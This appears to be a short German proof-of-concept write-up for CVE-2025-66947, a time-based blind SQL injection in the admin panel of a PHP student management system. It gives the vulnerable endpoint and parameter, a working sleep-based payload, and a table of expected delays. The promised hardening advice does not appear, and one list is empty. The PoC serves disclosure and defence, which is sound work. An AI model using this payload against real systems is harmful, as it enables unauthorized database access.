
Proof-of-Concept für zeitbasierte blinde SQL-Injection in einem PHP-Admin-Panel. Demonstriert die Ausnutzung über einen nicht bereinigten GET-Parameter, mit Hinweisen zur Absicherung für den defensiven Einsatz.
⏱️ Visueller Vergleich: normale Antwort vs. ~6s verzögerte Antwort
TL;DR: Ein GET-Parameter in einem Admin-Modul ermöglicht zeitbasierte SQL-Injection über Antwortverzögerungen.
Eine zeitbasierte Blind-SQL-Injection-Schwachstelle existiert in krishanmuraiji SMS v1.0 aufgrund einer unzureichenden Validierung eines GET-Parameters in einem administrativen Modul.
/studentms/admin/edit-class-detail.phpeditid (GET)/studentms/admin/edit-class-detail.php?editid=12
/studentms/admin/edit-class-detail.php?editid=12*if(now()=sysdate(),sleep(6),0)
| Payload | Verzögerung |
|---|---|
sleep(3) | ~3s |
sleep(6) | ~6s |
sleep(15) | ~15s |
Konsistente Verzögerung = SQL-Injection bestätigt
Dieses Schwachstellenmuster tritt häufig auf in:
Selbst wenn eine Authentifizierung erforderlich ist und Fehler verborgen sind,
bleibt zeitbasierte SQL-Injection ausnutzbar und gefährlich.
Schweregrad: Hoch
CVE-2025-66947
Ranjan KumarDieser PoC dient ausschließlich Lehr- und Verteidigungszwecken.
CVE-2025-66947, SQL Injection, zeitbasierte Blind-SQL-Injection, PHP, Admin-Panel